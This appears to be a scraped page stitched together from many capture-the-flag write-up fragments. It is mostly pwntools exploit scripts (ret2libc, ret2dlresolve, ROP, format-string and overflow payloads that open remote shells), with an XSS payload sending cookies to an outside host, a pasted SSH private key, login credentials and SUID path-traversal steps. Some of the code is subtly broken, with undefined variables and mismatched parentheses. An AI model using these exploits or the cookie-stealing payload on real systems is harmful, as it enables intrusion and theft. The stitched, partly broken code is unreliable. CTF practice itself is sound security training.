Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Even though Solar Designer gave you his times technique, you have to resolve(sort-out) yourself and go deeper. This time rope willn't let you have anything you want but you have to make a fake rope and get everything.
nc pwn.darkarmy.xyz 5001from pwn import *
elf = context.binary = ELF('./newPaX', checksec=False)
if args.REMOTE:
p = remote('newpax.darkarmy.xyz', 5001)
else:
p = process()
rop = ROP(elf)
# obviously a ret2dlresolve
dlresolve = Ret2dlresolvePayload(elf, symbol='system', args=['/bin/sh'])
rop.raw('A' * 52)
rop.read(0, dlresolve.data_addr, 100)
rop.ret2dlresolve(dlresolve)
p.sendline(rop.chain())
p.sendline(dlresolve.payload) # now the read is called and we pass all the relevant structures in
p.interactive()I lost my phone while I was travelling back to home but I was able to get back my eNB ID, MCC and MNC could you help me catch the tower it was last found. Note: decimal value upto 1 digit
Rotor 2 = I
Rotor 3 = IV
Rotor 4 = VIII love this watch. It's been with me all over the world, from Istanbul to Shanghai
to Macau. I wear it with suits quite a lot. My boss liked it too. I remember
wearing it when she died. What is her successor's name?A reporter wanted to know where this flight is headed. Where does he (the reporter) live?
Hoshimaseok is up to no good. Track him down.
API_KEY = randomapi
FLAG = csictf{sc4r3d_0f_c0mm1tm3nt}The original photographer of this picture commented the flag on his post. Find the flag.
from pwn import *
p = remote('chall.csivit.com', 30001)
p.sendline('A' * 200)
print(p.clean().decode())from pwn import *
p = remote('chall.csivit.com', 30007)
payload = b'A' * 44
payload += p32(0xcafebabe)
p.sendline(payload)
print(p.clean().decode())from pwn import *
elf = ELF('./vuln')
p = remote('chall.csivit.com', 30013)
payload = b'A' * 40
payload += p64(elf.symbols['flag'])
p.clean()
p.sendline(payload)
print(p.clean(2).decode())from pwn import *
elf = ELF('./vuln')
p = remote("chall.csivit.com", 30023)
admin = elf.symbols['admin']
value = 0xb4dbabe3 # this is the needed admin value
payload = fmtstr_payload(12, {admin : value})
p.sendline(payload)
print(p.clean().decode())Wanna enter the Secret Society? Well you have to find the secret code first!
from pwn import *
elf = context.binary = ELF('./hello')
# Adapt for remote
if args.REMOTE:
libc = ELF('./libc-remote.so')
p = remote('chall.csivit.com', 30046)
else:
libc = elf.libc
p = elf.process()
# ret2plt
p.clean(1)
payload = flat(
b'A' * 136,
elf.plt['puts'],
elf.symbols['main'], # 32-bit - return address comes directly after the function call
elf.got['puts'] # Parameter comes after the return address
)
p.sendline(payload)
p.recvline() # This is the 'Hello, <>!' string - we don't need this
puts_libc = u32(p.recv(4)) # The puts call. We only need the first 4 bytes (the GOT entry of puts)
log.success(f'Puts@LIBC: {hex(puts_libc)}')
libc.address = puts_leak - libc.symbols['puts']
log.success(f'Libc base: {hex(libc.address)}')
p.clean(1)
# Final ret2libc
payload = flat(
b'A' * 136,
libc.symbols['system'],
libc.symbols['exit'],
next(libc.search(b'/bin/sh\x00'))
)
p.sendline(payload)
p.interactive()blaise: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=00fb13e98a303dff4159e894942e363208415ba1, for GNU/Linux 3.2.0, not stripped$ ./blaise
15$ ./blaise
19
12
24
a
$def f(num):
ret = 1
counter = 2
while counter <= num:
ret *= counter
counter += 1
return ret
def c(ran, counter):
num1 = f(ran)
num2 = f(counter)
num3 = f(ran - counter)
return num1 / (num2 * num3)from pwn import *
from sys import argv
if argv[1] == "r":
p = remote("chall.csivit.com", 30808)
else:
e = ELF("./blaise")
p = e.process()
rand = int(p.recvline()) # Recieves random number
log.info(f"random number: {rand}")
def f(num):
ret = 1
counter = 2
while counter <= num:
ret *= counter
counter += 1
return ret
def c(ran, counter):
num1 = f(ran)
num2 = f(counter)
num3 = f(ran - counter)
return num1 / (num2 * num3)
for i in range(0, rand + 1):
data = int(c(rand, i)) # Gets required number
p.sendline(str(data)) # Sends
flag = p.clean()
if flag: # I was lazy :p
log.info(f"flag is: {flag.decode()}")
exit()int main(void)
{
int random;
time_t tVar1;
long result;
long input;
time_t local_40;
time_t local_38;
time_t local_30;
long number2;
long number1;
char *time_to_execute;
int counter;
int check;
setbuf(stdin,(char *)0x0);
setbuf(stdout,(char *)0x0);
setbuf(stderr,(char *)0x0);
tVar1 = time(&local_30);
srand((uint)tVar1);
time(&local_38);
check = 1;
counter = 0;
while( true ) {
random = rand();
if (random % 3 + 4 < counter) break;
random = rand();
number1 = (long)(random % 10 + 6);
random = rand();
number2 = (long)(random % 10 + 6);
printf("%d %d\n",number1,number2);
__isoc99_scanf(&DAT_0040200f,&input);
result = function1(number1,number2);
result = function2(result + 3);
if (result != input) {
check = 0;
}
counter = counter + 1;
}
time(&local_40);
time_to_execute = (char *)(double)(local_40 - local_38);
printf(time_to_execute,"fun() took %f seconds to execute \n");
if ((check != 1) || (30.00000000 < (double)time_to_execute)) {
printf("Nahh.");
}
else {
puts("Hey, you got me!");
system("cat flag.txt");
}
return 0;
}number1 = (long) (random % 10 + 6);
random = rand();
number2 = (long) (random % 10 + 6);
printf("%d %d\n", number1, number2);
__isoc99_scanf(&DAT_0040200f, &input);
result = function1(number1, number2);
result = function2(result + 3);
if (result != input) {
check = 0;
}if ((check != 1) || (30.00000000 < (double)time_to_execute)) {
printf("Nahh.");
}
else {
puts("Hey, you got me!");
system("cat flag.txt");
}long function1(long num1,long num2)
{
int counter;
int answer;
answer = 0;
counter = 1;
while ((counter <= num1 || (counter <= num2))) {
if ((num1 % (long) counter == 0) && (num2 % (long) counter == 0)) {
answer = counter;
}
counter = counter + 1;
}
return (long)answer;
}long function2(long number)
{
long lVar1;
if (number == 0) {
lVar1 = 1;
}
else {
lVar1 = function2(number - 1);
lVar1 = lVar1 * number;
}
return lVar1;
}def function2(number):
if number == 0:
return 1
return number * function(number - 1)two numbers -> highest common factor -> +3 -> factorial -> compared to inputfrom pwn import *
from numpy import gcd
import numpy
p = remote('chall.csivit.com', 30827)
while True:
try:
num1, num2 = map(int, p.recvline().decode().split()) # Cast and assign the two numbers
log.info(f'{num1} {num2}')
hcf = gcd(num1, num2)
log.success(f'HCF of {num1} and {num2} is {hcf}')
fact = numpy.math.factorial(hcf + 3)
log.success(f'Factorial of {hcf + 3}: {fact}')
p.sendline(f'{fact}')
except ValueError:
# If it's ValueError it can't be cast to an int, so we've received the flag
break
print(p.clean(1).decode())"People who get violent get that way because they can’t communicate."
# Hey there, you're not a robot, yet I see you sniffing through this file.
# SEO you later!
# Now get off my lawn.
Disallow: /fade/to/blackzmxhz3tkb2vzx3roaxnfzxzlbl9jb3vudf9hc19jcnlwdg9vb30=ZmxhZ3tkb2VzX3RoaXNfZXZlbl9jb3VudF9hc19jcnlwdG9vb30=This is from the back Solar Designer times where you require rope to climb and get anything you want.
nc pwn.darkarmy.xyz 5002from pwn import *
elf = context.binary = ELF('./roprop', checksec=False)
if args.REMOTE:
libc = ELF('./libc-remote.so')
p = remote('roprop.darkarmy.xyz', 5002)
else:
libc = elf.libc
p = process()
p.recvuntil('s.\n\n')
rop = ROP(elf)
rop.raw('A' * 88)
rop.puts(elf.got['puts'])
rop.raw(elf.sym['main'])
p.sendline(rop.chain())
leak = u64(p.recv(6) + b'\x00\x00')
log.success(f'Leak: {hex(leak)}')
p.recvlines(2)
libc.address = leak - libc.sym['puts']
log.success(f'LIBC base: {hex(libc.address)}')
# ret2libc
rop = ROP(libc)
rop.raw('A' * 88)
rop.execve(next(libc.search(b'/bin/sh\x00')), 0, 0)
p.sendline(rop.chain())
p.interactive()These 3 guys encrypted my flag, but they didn't tell me how to decrypt it.
n = 408579146706567976063586763758203051093687666875502812646277701560732347095463873824829467529879836457478436098685606552992513164224712398195503564207485938278827523972139196070431397049700119503436522251010430918143933255323117421712000644324381094600257291929523792609421325002527067471808992410166917641057703562860663026873111322556414272297111644069436801401012920448661637616392792337964865050210799542881102709109912849797010633838067759525247734892916438373776477679080154595973530904808231
e = 65537
c = 226582271940094442087193050781730854272200420106419489092394544365159707306164351084355362938310978502945875712496307487367548451311593283589317511213656234433015906518135430048027246548193062845961541375898496150123721180020417232872212026782286711541777491477220762823620612241593367070405349675337889270277102235298455763273194540359004938828819546420083966793260159983751717798236019327334525608143172073795095665271013295322241504491351162010517033995871502259721412160906176911277416194406909./RsaCtfTool.py -n 408579146706567976063586763758203051093687666875502812646277701560732347095463873824829467529879836457478436098685606552992513164224712398195503564207485938278827523972139196070431397049700119503436522251010430918143933255323117421712000644324381094600257291929523792609421325002527067471808992410166917641057703562860663026873111322556414272297111644069436801401012920448661637616392792337964865050210799542881102709109912849797010633838067759525247734892916438373776477679080154595973530904808231 -e 65537 --uncipher 226582271940094442087193050781730854272200420106419489092394544365159707306164351084355362938310978502945875712496307487367548451311593283589317511213656234433015906518135430048027246548193062845961541375898496150123721180020417232872212026782286711541777491477220762823620612241593367070405349675337889270277102235298455763273194540359004938828819546420083966793260159983751717798236019327334525608143172073795095665271013295322241504491351162010517033995871502259721412160906176911277416194406909def b(num):
my_str = str(num)
rev_str = reversed(my_str)
if list(my_str) == list(rev_str):
return True
else:
return Falsedef a(num):
if (num > 1):
for i in range(2, num)):
if (num % i) == 0:
return False
break
return True
else:
return Falsefrom sympy import isprime
def a(num):
return isprime(num)}<</style>>`;<<img src=x onerror=document.location="https://ennfyqj04serj.x.pipedream.net/?c="+document.cookie;>>binwalk -e microsooft.docxwhile read line; do echo $line; done < flag.txtgrep -r "flag{" | grep -v "sys"void FUN_0040130e(void)
{
char local_218 [524];
int local_c;
local_c = open("./flag.txt",0);
read(local_c,local_218,0x200);
close(local_c);
puts(local_218);
return;
}from pwn import *
p = remote('jh2i.com', 50011)
p.clean(0.2)
payload = b'A' * 497
payload += p64(0x40130e)
p.sendline(payload)
print(p.clean(1))7z x candroid.apkgrep -rnw "flag"cat classes.dex | grep flagvolatility -f memdump.raw --profile=Win7SP1x86_23418 cmdscanecho JCTF{nice_volatility_tricks_bro}import socket
from caesarcipher import CaesarCipher
host = "jh2i.com"
port = 50034
count = 0
flag = [" "] * 30
print(len(flag))
while True:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
while True:
try:
data = s.recv(1024).decode("utf-8")
for i in range(1, 27, 1):
x = CaesarCipher(data, offset=i).encoded
if "send" in x:
break
if count > 0:
pos = x.split(" ")[6]
char = x.split(" ")[11].replace("\n","")
print(pos, char)
flag[int(pos)] = char
s.sendall(data.encode())
if len(data) == 0:
break
count += 1
except:
print("error", flag)
s.close()
count = 0
break
if " " not in flag:
break
u = ""
for i in flag:
u += i
print(u)7z x candroid.apkstrings resources.arsc | grep flagfrom pwn import *
p = remote('jh2i.com', 50031)
initial = p.clean(1).decode("UTF-8")
p.sendline("6")
p.sendline("1")
new = p.clean(1).decode("utf-8")
for i in range(0, 2500):
p.sendline("5")
p.sendline("6")
p.sendline("4")
next = p.clean(1).decode("utf-8")
print(next)
for i in range(0, 3000):
p.sendline("2")
p.interactive()extract($_POST);
if (isset($emergency)){
echo(file_get_contents("/flag.txt"));
}User-agent: *
Disallow: /cookie.php"Our_Fav_Cookie=8de0b3c47f112c59745f717a626932264c422a7563954872e237b223af4ad643; Piece=6"from requests import Session
sess = Session()
while True:
r = sess.get('http://15.206.202.26/cookie.php')
cookies = r.cookies.get_dict()
print(cookies)c4694f2e93d5c4e7d51f9c5deb75e6cc8be5e1114178c6a45b6fc2c566a0aa8c : O
f67ab10ad4e4c53121b6a5fe4da9c10ddee905b978d3788d2723d7bfacbe28a9 : F
4ae81572f06e1b88fd5ced7a1a000945432e83e1551e6f721ee9c00b8cc33260 : Q
5c62e091b8c0565f1bafad0dad5934276143ae2ccef7a5381e8ada5b1a8d26d2 : P
333e0a1e27815d0ceee55c473fe3dc93d56c63e3bee2b3b4aee8eed6d70191a3 : G
8de0b3c47f112c59745f717a626932264c422a7563954872e237b223af4ad643 : S
021fb596db81e6d02bf3d2586ee3981fe519f275c0ac9ca76bbcf2ebb4097d96 : {
5c62e091b8c0565f1bafad0dad5934276143ae2ccef7a5381e8ada5b1a8d26d2 : P
5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9 : 0
[...]cat cracked | awk -F ' : ' '{print $2}' > flag
for line in $(cat flag); do echo -n $line; doneOFQPGS{P00x135_ne3_o35g_cy4p3_70_pu3px}ssh -i config/id_rsa nahamcontron@jh2i.com -p 50033$ dig ANY jh2i.com
;; ANSWER SECTION:
jh2i.com. 3600 IN A 161.35.252.71
jh2i.com. 21600 IN NS ns-cloud-a2.googledomains.com.
jh2i.com. 21600 IN NS ns-cloud-a3.googledomains.com.
jh2i.com. 21600 IN NS ns-cloud-a4.googledomains.com.
jh2i.com. 21600 IN NS ns-cloud-a1.googledomains.com.
jh2i.com. 21600 IN SOA ns-cloud-a1.googledomains.com. cloud-dns-hostmaster.google.com. 48 21600 3600 259200 300
jh2i.com. 3600 IN SPF "flag{next_year_i_wont_use_spf}"-----BEGIN OPENSSH PRIVATE KEY-----
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
xTSB/z4XAJNBkAAAAKam9obkB4cHMxNQE=
-----END OPENSSH PRIVATE KEY-----ssh -i key nahamcontron@jh2i.com -p 50033What is the MD5 hash of the Windows executable file?
NOTE: If you extract any files within this challenge, please delete the file after you have completed thelink: https://tinyurl.com/y3oltdh5
password: hacktoberThe malware uses four different ip addresses and ports for communication, what IP uses the same port as https? Submit the flag as: flag{ip address}.
Use the file from Evil Corp's Child.What is the localityName in the Certificate Issuer data for HTTPS traffic to 37.205.9.252?
Use the file from Evil Corp's Child.Thanks for attending BSides, have a nice day!
aka working with pcaps
Some of the Forensics Challenges from Hacktoberfest CTF 2020.
$ ./chall
It's been fun, but here we are at the final challenge!
May I know your name?
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
It's been nice meeting you, aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!
Segmentation faultfrom pwn import *
elf = context.binary = ELF('./chall')
if args.REMOTE:
p = remote('13.233.104.112', 2222)
libc = ELF('./libc-remote.so')
else:
p = process()
libc = elf.libcpayload = flat(
'A' * 40,
0x080490a0, # puts@PLT
elf.sym['main'],
elf.got['puts']
)
p.recvuntil('name?\n')
p.sendline(payload)p.recvline()
puts_leak = u32(p.recv(4))
log.success(f'Puts@libc: {hex(puts_leak)}')
libc.address = puts_leak - libc.sym['puts']
log.success(f'libc: {hex(libc.address)}')
p.clean()payload = flat(
'A' * 40,
libc.sym['system'],
libc.sym['exit'],
next(libc.search(b'/bin/sh'))
)
p.sendline(payload)
p.interactive()from pwn import *
elf = context.binary = ELF('./chall')
if args.REMOTE:
p = remote('13.233.104.112', 2222)
libc = ELF('./libc-remote.so')
else:
p = process()
libc = elf.libc
# context.log_level = 'debug'
payload = flat(
'A' * 40,
0x080490a0, # puts@PLT
elf.sym['main'],
elf.got['puts']
)
p.recvuntil('name?\n')
p.sendline(payload)
p.recvline()
puts_leak = u32(p.recv(4))
log.success(f'Puts@libc: {hex(puts_leak)}')
libc.address = puts_leak - libc.sym['puts']
log.success(f'libc: {hex(libc.address)}')
p.clean()
payload = flat(
'A' * 40,
libc.sym['system'],
libc.sym['exit'],
next(libc.search(b'/bin/sh'))
)
p.sendline(payload)
p.interactive()$ python3 exploit.py REMOTE
[+] Puts@libc: 0xf7dad3d0
[+] libc: 0xf7d46000
[*] Switching to interactive mode
It's been nice meeting you, AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]
$ ls
chall
flag
run.sh
$ cat flag
BSDCTF{3xpl0r1ng_th3_unkn0wn}The amcache can be a pretty handy tool to help build out a timeline of execution during an investigation, and is always located in \%SystemRoot%\AppCompat\Programs\Amcache.hve what was the application
file: https://tinyurl.com/y4z72k5o
Password: hacktoberMy nephew is a fussy eater and is only willing to eat chocolate oreo. Any other flavour and he throws a tantrum.
AmcacheParser.exe-fAmcache.hve--csvOutputFolderWe found some unusual activity coming from an employee's Windows 10 workstation at De Monne Financial. Our IT guy saved the memory dump to the file provided below. What was the PID of the program used
AmcacheParser.exe -f "Amcache.hve" --csv OutputFolderWhat is the name of the executable in the malicious url? Submit the filename as the flag: flag{virus.bad}.What MYDDNS domain is used for the post-infection traffic in RATPack.pcap?
Use the file from Remotely Administrated Evil.volatility -f mem.raw imageinfo > raw_imageinfo.txtVolatility Foundation Volatility Framework 2.6.1
INFO : volatility.debug : Determining profile based on KDBG search...
Suggested Profile(s) : Win10x64_17134, Win10x64_14393, Win10x64_10586, Win10x64_16299, Win2016x64_14393, Win10x64_17763, Win10x64_15063 (Instantiated with Win10x64_15063)
AS Layer1 : SkipDuplicatesAMD64PagedMemory (Kernel AS)
AS Layer2 : FileAddressSpace (/home/REDACTED/Downloads/mem.raw)
PAE type : No PAE
DTB : 0x1aa000L
KDBG : 0xf8001e43d520L
Number of Processors : 2
Image Type (Service Pack) : 0
KPCR for CPU 0 : 0xfffff8001d4e2000L
KPCR for CPU 1 : 0xffffd40032268000L
KUSER_SHARED_DATA : 0xfffff78000000000L
Image date and time : 2020-06-26 15:51:36 UTC+0000
Image local date and time : 2020-06-26 08:51:36 -0700volatility -f raw.mem --profile=Win10x64_1734 pstree > raw_pstree.txt Name Pid PPid Thds Hnds Time
-------------------------------------------------- ------ ------ ------ ------ ----
0xffff87868e88d440:System 4 0 111 0 2020-06-26 15:07:32 UTC+0000
. 0xffff878690147040:smss.exe 348 4 2 0 2020-06-26 15:07:32 UTC+0000
. 0xffff87868e975040:Registry 88 4 3 0 2020-06-26 15:07:23 UTC+0000
. 0xffff878690ccc040:MemCompression 1168 4 50 0 2020-06-26 15:07:58 UTC+0000
0xffff878690495080:wininit.exe 528 424 1 0 2020-06-26 15:07:45 UTC+0000
. 0xffff8786904cd080:services.exe 648 528 6 0 2020-06-26 15:07:46 UTC+0000
.. 0xffff8786914d2580:TrustedInstall 2572 648 5 0 2020-06-26 15:43:20 UTC+0000
.. 0xffff878690c8d580:svchost.exe 1052 648 18 0 2020-06-26 15:07:58 UTC+0000
.. 0xffff878690c2d580:svchost.exe 60 648 64 0 2020-06-26 15:07:56 UTC+0000
... 0xffff8786909b0580:sihost.exe 2672 60 15 0 2020-06-26 15:08:51 UTC+0000
... 0xffff87868fa02580:wuauclt.exe 5288 60 7 0 2020-06-26 15:43:18 UTC+0000
... 0xffff8786909e1580:taskhostw.exe 2764 60 10 0 2020-06-26 15:08:52 UTC+0000 .... 0xffff87868f2e1080:winpmem_v3.3.r 3348 784 5 0 2020-06-26 15:51:36 UTC+0000 File: https://tinyurl.com/y259doyq
Password: hacktoberA malicious dll was downloaded over http in this traffic, what was the ip address that delivered this file?What is the domain used by the post-infection traffic over HTTPS?
Use the file from An Evil Christmas Carol.



auth=7b2275736572223a202261646d696e222c202270617373776f7264223a202270617373222c202261646d696e223a20747275652c2022646967657374223a2022686173686c69622e736861353132287365637265745f6b6579202b206279746573286a736f6e2e64756d707328636f6f6b69652c20736f72745f6b6579733d54727565292c205c2261736369695c2229292e6865786469676573742829227d{'user': 'admin', 'password': 'pass', 'admin': True, 'digest': 'hashlib.sha512(secret_key + bytes(json.dumps(cookie, sort_keys=True), "ascii")).hexdigest()'}


























Author: syyntax
We've obtained access to a server maintained by spookyboi. There are four flag files that we need you to read and submit (flag1.txt, flag2.txt, etc). Submit the contents of flag1.txt.
ssh hacktober@env.hacktober.io
Password: hacktober-Underdog-Truth-Glimpseluciafer@40504779afeb:~/Documents$ ls -alt
total 20
drwxrwxr-x 1 luciafer luciafer 4096 Oct 6 08:36 .
-rw-rw-r-- 1 luciafer luciafer 47 Oct 6 08:36 .flag2.txt
-rw-rw-r-- 1 luciafer luciafer 47 Oct 5 14:55 flag1.txt
drwxr-xr-x 1 luciafer luciafer 4096 Oct 5 14:54 ..luciafer@40504779afeb:/root$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/umount
/usr/bin/passwd
/usr/bin/mount
/usr/bin/gpasswd
/usr/bin/su
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/chfn
/usr/local/bin/ouija
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helperluciafer@40504779afeb:/root$ /usr/local/bin/ouija
OUIJA 6.66 - Read files in the /root directory
Usage: ouija [FILENAME]
EXAMPLES:
ouija file.txt
ouija read.meluciafer@40504779afeb:/root$luciafer@40504779afeb:/root$ /usr/local/bin/ouija flag4.txt
flag{4781cbffd13df6622565d45e790b4aac2a4054dc}luciafer@40504779afeb:/root$ /usr/local/bin/ouija ../home/spookyboi/Documents/flag3.txt
flag{445b987b5b80e445c3147314dbfa71acd79c2b67}

